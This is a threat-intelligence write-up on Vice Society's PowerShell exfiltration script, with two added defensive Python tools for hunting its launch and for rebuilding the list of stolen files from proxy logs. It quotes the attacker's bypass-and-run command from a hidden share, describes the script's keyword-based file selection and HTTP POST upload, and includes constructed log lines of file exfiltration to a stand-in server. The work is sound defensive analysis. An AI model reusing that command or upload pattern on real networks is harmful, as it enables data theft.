The threat actor known as Vice Society, a ransomware gang best known for its attacks on the education sector in the USA, has recently been found using a custom Microsoft PowerShell (PS) script to exfiltrate data from its victims. The group previously used PS scripts staged on a domain controller for a range of malicious activity: system discovery, system changes, defence evasion, persistence, data exfiltration, and delivery of ransomware payloads. Researchers from Palo Alto Networks' Unit 42 Incident Response team have found that Vice Society now uses an automated PS script, w1.ps1, for data exfiltration; the script takes no arguments and decides for itself which data to steal.
In the intrusion Unit 42 investigated, the script was launched with the command powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1 on a domain controller in the victim's network. The script itself was hosted on a hidden share named s$ (the trailing $ keeps it out of share listings) on the host at [redacted_ip]. This is a UNC (Universal Naming Convention) path, not a URN, and its host portion has been redacted to [redacted_ip]. Running the script from the domain controller rather than from the machines holding the data may indicate that the data the actors wanted sat on hosts they had not otherwise compromised; the domain controller gives them a position from which the script can reach shares on any endpoint in the network. The -ExecutionPolicy Bypass switch is a parameter of powershell.exe, not something inside the script, and it is there so that whatever execution policy is configured does not stop the file from running. Execution policy is not a security boundary (it exists to prevent accidental execution and any user can override it on the command line), so it should not be counted on as a control; process-creation telemetry showing powershell.exe started with a UNC-hosted -File argument and a bypass switch is the more useful signal.
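The launch command above is a good hunting target in process-creation telemetry (Sysmon Event ID 1, Windows Security event 4688). The following is an added example written for this page, not code from Unit 42 or from the Vice Society script: it parses command lines, flags PowerShell started with -File on a UNC-hosted script, and records whether the share is hidden (name ending in $) and whether the execution policy is bypassed, including the abbreviated forms (-ep, -exec) PowerShell accepts. The sample command lines are constructed; the first one is the page's quoted command with the IP left redacted.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation command lines for the example (not real telemetry).
# The first is the command the page quotes, with the IP kept redacted as on the page.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1",
    r"powershell.exe -ep bypass -NoProfile -File \\10.0.0.5\share$\backup.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\inventory.ps1",
    r"pwsh.exe -Command Get-Process",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File \\fileserver\it\login.ps1",
]

# powershell.exe / pwsh.exe, bare or with a full path, at the start of the command line
PS_EXE_RE = re.compile(r'(?i)^"?(?:[a-z]:\\[^"\s]*\\)?(?:powershell|pwsh)(?:\.exe)?"?(?:\s|$)')
# -ExecutionPolicy Bypass, including the prefixes PowerShell accepts (-ex, -exec, -ep)
BYPASS_RE = re.compile(r'(?i)-(?:ep|ex[a-z]*)\s+bypass\b')
# -File pointing at a UNC path: \\host\share\...\name.ps1
UNC_FILE_RE = re.compile(r'(?i)-f(?:ile)?\s+"?(\\\\([^\\\s"]+)\\([^\\\s"]+)\\([^"\s]+\.ps1))')


@dataclass
class Finding:
    command_line: str
    script_path: str    # full UNC path to the script
    host: str           # host part of the UNC path
    share: str          # share name, e.g. s$
    hidden_share: bool  # share name ends with $, so it does not appear in share listings
    policy_bypass: bool


def analyze(command_line: str) -> Optional[Finding]:
    """Return a Finding when PowerShell is started with -File on a UNC-hosted script
    and either the share is hidden or the execution policy is bypassed."""
    if not PS_EXE_RE.match(command_line):
        return None
    m = UNC_FILE_RE.search(command_line)
    if not m:
        return None
    script_path, host, share, _name = m.groups()
    hidden = share.endswith("$")
    bypass = BYPASS_RE.search(command_line) is not None
    if not (hidden or bypass):
        return None
    return Finding(command_line, script_path, host, share, hidden, bypass)


def scan(command_lines: List[str]) -> List[Finding]:
    """Run analyze() over a batch of command lines and keep the hits."""
    return [f for f in map(analyze, command_lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        flags = ", ".join(n for n, v in (("hidden share", f.hidden_share),
                                          ("policy bypass", f.policy_bypass)) if v)
        print(f"{f.host}\\{f.share}  {f.script_path}  [{flags}]")
```

On the constructed input only the two UNC-hosted scripts with a hidden share or a bypass are reported; the script run from a local path and the one run with RemoteSigned from a normal share are left alone. Tune the last condition to your environment: some administrators do legitimately run scripts from hidden shares, in which case the host and share names are what to baseline.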
In the intrusion Unit 42 investigated, the script begins by declaring the variables $id and $token, hard-coded to TEST and TEST_1 respectively. In other intrusions these might carry a victim identifier, or they might always be left at these test values. The script then declares the functions that make up its main body: identifying directories worth stealing from, processing them in batches, and exfiltrating the selected files via HTTP POST requests. Before any of these functions is called, the script builds a list of mounted volumes through WMI (Windows Management Instrumentation) with a call to Get-WmiObject Win32_Volume, storing the result in an array named $drives. Each drive path is then passed in turn to the Work() function to process its directories.
The main functions run in sequence. Work($disk) walks the drive and identifies candidate directories, skipping a hard-coded ignore list. Show($name) takes the directories that survive the ignore list and chunks them into groups of five before handing them on. CreateJobLocal($folders) receives each group of five and builds the PS script blocks that it runs as background jobs through the Start-Job cmdlet. Inside those jobs an inclusion/exclusion pass selects what to steal based on keywords in directory and file names: Get-ChildItem is called with its -Include parameter for the inclusion list and an exclusion list drops matches the actor does not want, with directories that match the include list handled first and the remaining directories checked afterwards. This keyword matching, rather than a list of exact directory names, is what lets the script choose its own targets on each victim. Matches are passed to the fill() function for upload.
fill([string]$filename) performs the actual exfiltration, one file per HTTP POST, to a web server controlled by Vice Society. It builds a $prefix value containing the IP address of the upload server and a port, which can be 80, 443, or a custom port. These two values are the most useful indicators of compromise (IoCs) from the intrusion; the remaining IoCs are incomplete because the hash of the original file was not available, so Unit 42 published the filename (w1.ps1) and the contents of the recovered script instead. The $id and $token variables declared at the top of the script are not needed for the upload itself, but both are embedded in the upload URL of each file.
The HTTP exfiltration begins with the creation of a WebClient object and a $fullPath variable holding the full path of the file being uploaded. Because the path travels in the request, a defender who captures the POST requests after the event (proxy logs, packet captures) can reconstruct the list of every file that was exfiltrated, provided the source host's IP address is also recorded. The upload URL, $uri, is assembled from $prefix, $token, $id and $fullPath, and WebClient.UploadFile() sends the file as an HTTP POST. Two details of this traffic are worth noting: the fullpath POST parameter omits the drive letter of the volume the file came from, so the same path could correspond to files on more than one volume, and the requests carry no User-Agent header, since WebClient does not set one unless the script adds it.
Using a PowerShell script for exfiltration is a living-off-the-land technique: PS scripts are so common in Windows environments that some security tools will not detect or alert on this one. If you suspect this script has been used on your network, Unit 42 has published a YARA rule that identifies it on disk. The education sector has been this actor's main target, but organisations in any sector could be hit. The hard-coded inclusion and exclusion lists are not the only selection mechanism: the script can also pick up files that are not on the inclusion list when their names match its keywords. The script excludes files over 10 KB in size, and its keyword list holds 433 strings in a small set of languages, mostly German and English, with the rest in Czech, Lithuanian, Luxembourgish, Portuguese and Polish. Not every file on a system can therefore be selected, but organisations operating in countries where these languages are spoken are the most exposed to this tool.
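The point about reconstructing the exfiltrated file list can be turned into a small forensic tool. The following is an added example written for this page, not code from Unit 42 or from the script itself. It reads constructed proxy/egress log lines, keeps POSTs that carry a fullpath parameter and no User-Agent, and groups the uploaded paths by exfiltration server and source host. The URL layout (token and id in the path, fullpath as a query parameter) is an assumption made for the example, since the page does not give the exact format; adapt the parser to the layout seen in your own capture.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed proxy/egress log lines for the example (not real data). Layout:
#   <timestamp> <src_ip> <method> "<url>" <status> <bytes> "<user_agent>"
# A "-" user agent means the client sent no User-Agent header. The upload URL
# layout (token and id in the path, fullpath as a query parameter) is assumed
# for this example; the page does not give the exact format.
SAMPLE_LOG = """\
2023-03-01T10:00:01Z 10.1.2.3 POST "http://203.0.113.10:8080/TEST_1/TEST/?fullpath=%5CUsers%5Cjdoe%5CDocuments%5Cpayroll_2022.xlsx" 200 48213 "-"
2023-03-01T10:00:02Z 10.1.2.3 POST "http://203.0.113.10:8080/TEST_1/TEST/?fullpath=%5CFinance%5CContracts%5Cnda_acme.docx" 200 9012 "-"
2023-03-01T10:00:03Z 10.1.2.9 GET "http://intranet.example.local/index.html" 200 1200 "Mozilla/5.0 (Windows NT 10.0)"
2023-03-01T10:00:04Z 10.1.2.3 POST "https://updates.example.com/report" 200 300 "Mozilla/5.0 (Windows NT 10.0)"
2023-03-01T10:00:05Z 10.1.2.4 POST "http://203.0.113.10:8080/TEST_1/TEST/?fullpath=%5CUsers%5Cjdoe%5CDocuments%5Cpayroll_2022.xlsx" 200 48213 "-"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\d+) "([^"]*)"$')


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, url, status, size, ua = m.groups()
    return {"ts": ts, "src": src, "method": method, "url": url,
            "status": int(status), "bytes": int(size), "ua": ua}


def exfil_path(rec: dict) -> Optional[str]:
    """Return the uploaded file path if the record looks like one of the script's
    uploads: an HTTP POST, no User-Agent header, and a fullpath query parameter.
    parse_qs already percent-decodes the value (%5C becomes a backslash)."""
    if rec["method"] != "POST" or rec["ua"] != "-":
        return None
    values = parse_qs(urlsplit(rec["url"]).query).get("fullpath")
    if not values:
        return None
    return values[0]


def build_inventory(log_text: str) -> Dict[str, Dict[str, List[str]]]:
    """Group uploaded paths by exfiltration server (ip:port) and then by source host.
    The paths carry no drive letter, as the page notes, so one path may have existed
    on more than one volume of the source host; correlate with its volume list."""
    inventory: Dict[str, Dict[str, set]] = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = exfil_path(rec)
        if path is None:
            continue
        dest = urlsplit(rec["url"]).netloc  # ip:port of the attacker's server
        inventory[dest][rec["src"]].add(path)
    return {dest: {src: sorted(paths) for src, paths in hosts.items()}
            for dest, hosts in inventory.items()}


def total_bytes(log_text: str) -> int:
    """Sum the byte counts of matched uploads: a rough lower bound on data lost."""
    return sum(rec["bytes"] for rec in map(parse_line, log_text.splitlines())
               if rec and exfil_path(rec) is not None)


if __name__ == "__main__":
    for dest, hosts in build_inventory(SAMPLE_LOG).items():
        print(f"exfiltration server {dest}")
        for src, paths in hosts.items():
            for p in paths:
                print(f"  {src}  {p}")
    print("bytes uploaded:", total_bytes(SAMPLE_LOG))
```

The unrelated GET and the POST that carries a browser User-Agent are dropped, and the same path seen from two source hosts is listed under each of them. Because the drive letter is missing from fullpath, the inventory should be checked against each host's volume list (the same Win32_Volume data the script itself enumerates) before it is reported as a definitive list of lost files.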